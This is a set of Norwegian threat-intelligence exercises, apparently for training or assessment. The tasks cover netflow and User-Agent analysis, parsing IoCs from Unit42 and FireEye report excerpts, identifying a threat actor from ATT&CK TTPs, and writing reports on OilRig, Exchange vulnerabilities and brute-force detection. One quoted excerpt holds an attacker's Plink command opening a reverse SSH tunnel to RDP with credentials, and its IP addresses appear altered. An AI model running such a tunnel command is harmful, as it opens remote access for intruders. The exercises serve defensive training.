I dette netflow-datasettet er det ønskelig å finne svar på følgende:
Hvor mange unike IP-adresser det er.
Hva den totale mengden bytes per IP, per retning er.
Hva prosentfordelingen av protokollene er.
Hva prosenfordelingen er blant portene, alle porter større enn 1024 kan omtales som high_ports.

Hadde det vært relevant å utvikle en annen datamodell?

Her er et utdrag listet, datasettet i sin helhet kan lastes ned her.

STARTTIME;SOURCE;DEST;PROTO;PACKETS;BYTES;DURATION

2019-09-03T05:00:03;8.8.8.8:53;10.23.35.133:64352;udp;1;78;00:00:00
2019-09-03T05:00:24;8.8.8.8:53;10.23.35.61:45153;udp;11;2191;00:00:00
2019-09-03T05:45:06;8.8.8.8:53;10.23.35.60:12789;udp;1;103;00:00:00
2019-09-03T05:48:26;8.8.8.8:53;10.23.35.61:54513;udp;11;2191;00:00:00
2019-09-03T05:01:03;8.8.8.8:53;10.13.232.89:29981;udp;1;235;00:00:00
2019-09-03T05:11:11;10.23.35.61:26653;8.8.8.8:53;udp;11;742;00:00:00

Følgende data mangler struktur for både at operatører skal kunne jobbe med opplysningene her, men også for å kunne gjøre videre automatiske korrelasjonsoperasjoner. Det er behov for å lage en modell som blant annet inneholder egenskapene kilde, navn, multivalue IoC og IoC-type, melding.

Det er ønskelig å se løsningen som parser de nedenforstående paragrafer og populerer modellen, for deretter å ha en programatisk løsning for å hente ut like IoCer på tvers av oppføringene med hvilket IDer som er berørt.

Unit42:ironnetinjector - When an IronPython script is run, it is loaded into the IronPython interpreter. In the IronPython script, the embedded .NET injector (SHA256: a56f69726a237455bac4c9ac7a20398ba1f50d2895e5b0a8ac7f1cdb288c32cc) and ComRAT DLL payload (SHA256: a62e1a866bc248398b6abe48fdb44f482f91d19ccd52d9447cda9bc074617d56) get decoded and decrypted. This is done with the Python Base64 module and the RijndaelManaged class from the C# cryptography namespace. The decryption key is passed as an argument to the IronPython script. The Rijndael initialization vector (IV) is stored in the script. Next, the .NET injector gets loaded into the IronPython process with the help of the Assembly.Load() method of the C# Reflection namespace. That’s possible because IronPython itself is a .NET assembly and thus its process already contains all the .NET runtime libraries.

Unit42:bumblebee-webshell-xhunt-campaign - The commands listed in Table 2 in the Appendix also show the actor using Plink (File: RTQ.exe) to create an SSH tunnel to an external IP address (IP: 10.13.232[.]89), as seen in the following command:

echo y | c:\windows\temp\RTQ.exe 10.119.110[.]194 -C -R 0.0.0.0:8081::3389 -l bor -pw 123321 -P 443

The IP address overlaps with other related infrastructure that we will discuss in a later section of this blog. Most importantly, the username and password of bor and 123321 used to create the SSH tunnel overlaps directly with prior xHunt activity. These exact credentials were listed within the cheat sheet found within the Sakabota tool, which provided an example command that the actor could use to create SSH tunnels using Plink. We believe the actor used the example command from the cheat sheet as a basis for the commands they used to create the SSH tunnels via BumbleBee. 

Fireeye:UNC1945 - PUPYRAT (aka Pupy) is an open source, multi-platform (Windows, Linux, OSX, Android), multi-function RAT (Remote Administration Tool) and post-exploitation tool mainly written in Python. It features an all-in-memory execution guideline and leaves very low footprint. It can communicate using various transports, migrate into processes (reflective injection), and load remote Python code, Python packages and Python C-extensions from memory.(MD5: d5b9a1845152d8ad2b91af044ff16d0b (SLAPSTICK)) (MD5; 0845835e18a3ed4057498250d30a11b1 (STEELCORGI)) (MD5: 6983f7001de10f4d19fc2d794c3eb534) (IP: 46.30.189.0/24) (IP: 66.172.12.0/24)

I dette datasettet hentet fra webtraffik med fokus på User-Agents, har vi følgende problemstillinger til deg:
Hvor mange oppføringer er det totalt?
Datasettet inneholder syntaksfeil, hvilke linjer?
Hvor mange unike User-Agents eksisterer i datasettet?
Hvor mange unike User-Agents har en forekomst som er større enn den gjennomsnittlige forekomsten?

Her er et utsnitt av datasettet, datasettet i sin helhet kan lastes ned her.

"time","UserAgents","Protocol","method"

"2021-03-04T17:35:37.979+0100","Mozilla/4.0 (compatible; ms-office;...
"2021-03-04T17:35:02.911+0100","Mozilla/4.0 (compatible; MSIE 6.0;...
"2021-03-04T17:35:01.587+0100","Mozilla/4.0 (compatible; ms-office;...
"2021-03-04T17:35:01.568+0100","Mozilla/4.0 (compatible; ms-office;...

Nøstede-koordinatlister - hvordan blir din visualisering?

{{5,65 5,1 26,1 39,3 46,7 49,13 52,18 53,27 53,35 52,45 48,52 44,56 39,60 32,63 26,65 5,65}{16,55 16,10 28,10 34,13 37,16 40,20 41,27 41,36 39,45 36,49 31,53 26,55 16,55}}
{{93,65 84,63 80,61 77,59 74,56 71,53 69,48 68,42 68,30 69,21 71,14 74,9 82,3 86,1 93,0 104,1 109,5 113,8 117,14 119,22 119,31 119,41 116,50 113,56 109,61 104,63 99,64 93,65}{93,55 86,51 84,49 81,45 81,38 81,26 82,18 87,13 90,10 95,10 100,12 104,16 106,22 107,27 107,36 106,42 104,47 103,50 100,53 98,54 93,55}}
{{132,65 195,65}}
{{229,64 218,64 218,41 197,1 210,1 223,30 238,1 250,1 229,41 229,64}}
{{288,65 279,63 275,61 272,59 269,56 266,53 264,48 263,42 263,30 264,21 266,14 269,9 277,3 281,1 288,0 299,1 304,5 308,8 312,14 314,22 314,31 314,41 311,50 308,56 304,61 299,63 294,64 288,65}{288,55 281,51 279,49 276,45 276,38 276,26 277,18 282,13 285,10 290,10 295,12 299,16 301,22 302,27 302,36 301,42 299,47 298,50 295,53 293,54 288,55}}
{{353,65 345,64 340,63 335,60 333,56 331,50 330,44 330,1 341,1 341,47 344,52 347,54 350,56 356,55 360,54 363,51 365,45 365,1 376,1 376,42 375,51 372,57 369,60 365,63 359,65 353,65}}
{{392,65 455,65}}
{{465,64 465,1 504,1 504,10 477,10 477,27 503,27 503,36 477,36 477,55 504,55 504,64 465,64}}
{{556,64 540,64 521,1 535,1 549,51 563,1 576,1 556,64}}
{{595,64 595,1 634,1 634,10 607,10 607,27 633,27 633,36 607,36 607,55 634,55 634,64 595,64}}
{{656,65 656,1 671,1 692,46 692,1 702,1 702,65 688,65 666,18 666,65 656,65}}
{{717,65 780,65}}
{{830,61 821,65 810,65 799,62 792,57 787,51 786,43 786,34 785,27 787,18 790,13 796,6 800,2 808,0 818,1 829,3 829,14 825,12 818,10 813,10 805,13 801,18 798,24 798,35 800,46 803,50 809,54 818,55 824,53 830,51 830,61}}
{{879,64 868,64 868,41 847,1 860,1 873,30 888,1 900,1 879,41 879,64}}
{{917,65 917,1 940,1 948,2 953,4 955,6 957,10 958,14 958,18 957,22 956,25 954,27 952,30 949,31 954,32 956,34 958,36 960,38 961,42 961,48 960,52 958,56 954,60 948,63 941,65 917,65}{929,28 929,11 938,11 943,13 945,16 945,20 944,24 941,26 939,28 929,28}{929,53 929,36 938,36 943,38 945,41 945,45 944,49 941,51 939,53 929,53}}
{{985,64 985,1 1024,1 1024,10 997,10 997,27 1023,27 1023,36 997,36 997,55 1024,55 1024,64 985,64}}
{{1046,64 1046,1 1068,1 1076,2 1082,4 1085,7 1087,11 1089,18 1088,23 1087,26 1085,29 1083,31 1079,32 1075,34 1079,37 1081,39 1093,64 1079,64 1071,44 1068,40 1064,38 1058,37 1058,64 1046,64}{1060,34 1060,11 1068,11 1074,12 1076,14 1078,16 1079,19 1079,23 1077,27 1076,30 1074,32 1070,33 1067,34 1060,34}}

Nedenfor er det listet en del TTPer (tactics, techniques & procedures) som blant annet benyttes til å beskrive trusselaktørenes handlemåter. En samling av slike TTPer kan dermed være med å beskrive en eller flere trusselaktører.

Hvilke trusselaktør eller gruppering kan beskrives med disse TTPene fra Mitre Att&ck:

Standard Encoding
rundll32
ChinaChopper
Archive via Utility
ASPXSpy

Vi har mottatt varsel om at trusselaktøren OilRig har fattet interessert for våres sektor, og at en nettverksoperasjon kan være nært forestående.

Utarbeide et beslutningsgrunnlag i rapportform til ledelsen hvor du du fremstiller trusselaktøren OilRig, med anbefalinger om hvordan vi kan forhindre og avdekke forsøk fra denne trusselaktøren.

Rapporten skal maksimalt være på to sider

Mange IT-løsninger har tekniske sårbarheter, og når disse blir offentlig kjent får de som oftes en CVE-ID og i noen tilfeller gis sårbarheter egne navn. Et eksempel på at sårbarheter har fått egne navn er heartbleed. Heartbleed var en svakhet i krypteringsbiblioteket OpenSSL. En annen it-løsning som i løpet av 2021 har vært utsatt for sårbarheter er Microsoft Exchange.

Utarbeid en presentasjon som tar for seg sårbarhetsløpet til MS Exchange i 2021. Presentasjonen bør gi driftspersonell en formening om eventuell viktighet, og hva de bør ha fokus på. Maksimalt 5 slides, slidene bør inneholde manus-notater.

Vi har trolig tjenester som kan bli utsatt for råkraftangrep (bruteforce) og disse bør sikres. Utarbeide et dokument “deteksjonslogikk for råkraftangrep” som kan benyttes til både et beslutningsgrunnlag av ledelsen for prioritet og ressurser, og av teknikere som skal håndtere problemstillingen. Dokumentet bør da inneholde en forklaring på råkraftangrep for ledere, en forklaring som teknikere kan nyttegjøre seg av for herding av sine systemer, og forslag på hvordan slike angrep kan oppdages.

Dokumentet skal maksimalt være på en side.